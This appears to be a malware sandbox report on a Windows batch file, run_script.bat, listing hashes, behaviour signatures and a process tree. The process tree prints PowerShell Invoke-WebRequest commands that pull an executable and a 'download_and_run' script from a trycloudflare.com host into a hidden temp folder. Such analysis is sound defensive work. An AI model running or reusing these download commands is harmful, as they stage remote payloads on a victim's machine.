Analysis
max time kernel: 117s
max time network: 119s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 13-11-2024 11:27
Static task: static1
Behavioral task: behavioral1
Sample: run_script.bat
Resource: win7-20240903-en
General
Target: run_script.bat
Size: 8KB
MD5: 2efffa15097ea8c880a10b0fea32054e
SHA1: f3e247d6aa4a2da2776a527e5ff7251576c1b260
SHA256: ddf7f8e12308ee481e883416af7cc1a19e7ce5feee7a69b3267f9d40480fe7b6
SHA512: caa107de8dd85690f576f01b69095f659465d6f7de8d079b06bb23dbf01c95e7e10d857535af2a523e42c8b6e775a8e819bb0413aa6a6b3c38c19f7ffcf88e76
SSDEEP: 192:CincTy8G+hpQyuPmhDGEhtKCDw16/zbq/Z/+Hz6XlNnGwzA84q7YmvqMA0b:gTYcpQyuPmhDGEhtKCVa/k+vnGUA84yR
Malware Config
Signatures

Command and Scripting Interpreter: PowerShell (signature name inferred from the process tree below; it is not captured in the signature header on this page)
Processes:
  pid   Process
  2952  powershell.exe
  2804  powershell.exe
  2676  powershell.exe
  2468  powershell.exe
  2804  powershell.exe
  2676  powershell.exe
  2468  powershell.exe
  2952  powershell.exe

Suspicious behavior: EnumeratesProcesses  4 IoCs
Processes:
  pid   Process
  2468  powershell.exe
  2952  powershell.exe
  2804  powershell.exe
  2676  powershell.exe

Suspicious use of AdjustPrivilegeToken  4 IoCs
Processes:
  description               pid   Process
  Token: SeDebugPrivilege   2468  powershell.exe
  Token: SeDebugPrivilege   2952  powershell.exe
  Token: SeDebugPrivilege   2804  powershell.exe
  Token: SeDebugPrivilege   2676  powershell.exe

Suspicious use of WriteProcessMemory  12 IoCs
Processes:
  description                          pid   Process  procid_target
  PID 2480 wrote to memory of 2468     2480  cmd.exe  32
  PID 2480 wrote to memory of 2468     2480  cmd.exe  32
  PID 2480 wrote to memory of 2468     2480  cmd.exe  32
  PID 2480 wrote to memory of 2952     2480  cmd.exe  33
  PID 2480 wrote to memory of 2952     2480  cmd.exe  33
  PID 2480 wrote to memory of 2952     2480  cmd.exe  33
  PID 2480 wrote to memory of 2804     2480  cmd.exe  34
  PID 2480 wrote to memory of 2804     2480  cmd.exe  34
  PID 2480 wrote to memory of 2804     2480  cmd.exe  34
  PID 2480 wrote to memory of 2676     2480  cmd.exe  35
  PID 2480 wrote to memory of 2676     2480  cmd.exe  35
  PID 2480 wrote to memory of 2676     2480  cmd.exe  35
Processes

[depth 1] C:\Windows\system32\cmd.exe  (PID 2480)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\run_script.bat"
  - Suspicious use of WriteProcessMemory

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2468)
    Command line: powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/RunHiddenConsole.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe'"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2952)
    Command line: powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/RunHiddenConsole.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\RunHiddenConsole.exe'"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2804)
    Command line: powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/download_and_run.ps1' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1'"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2676)
    Command line: powershell -Command "Invoke-WebRequest -Uri 'https://visits-marie-dial-feet.trycloudflare.com/test/download_and_run.ps1' -OutFile 'C:\Users\Admin\AppData\Local\Temp\MyHiddenScript\download_and_run.ps1'"
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: 4222af73b1775a156ec77fb80b99f0fb
SHA1: fc823804ca071b6d011bf647064fa6e40ecfd4cd
SHA256: 5f19d3970796ae6453315c3dc837ea68f11e949c1017012ea695e1206ccaa3ae
SHA512: 26fabd321d73ec1a2e21ee4c869155f918c83a98869017f11d105ab6caedd42613742dc27cda8da9d604fb6206efeaa158526b376f629ed8fee59bea16e9ad22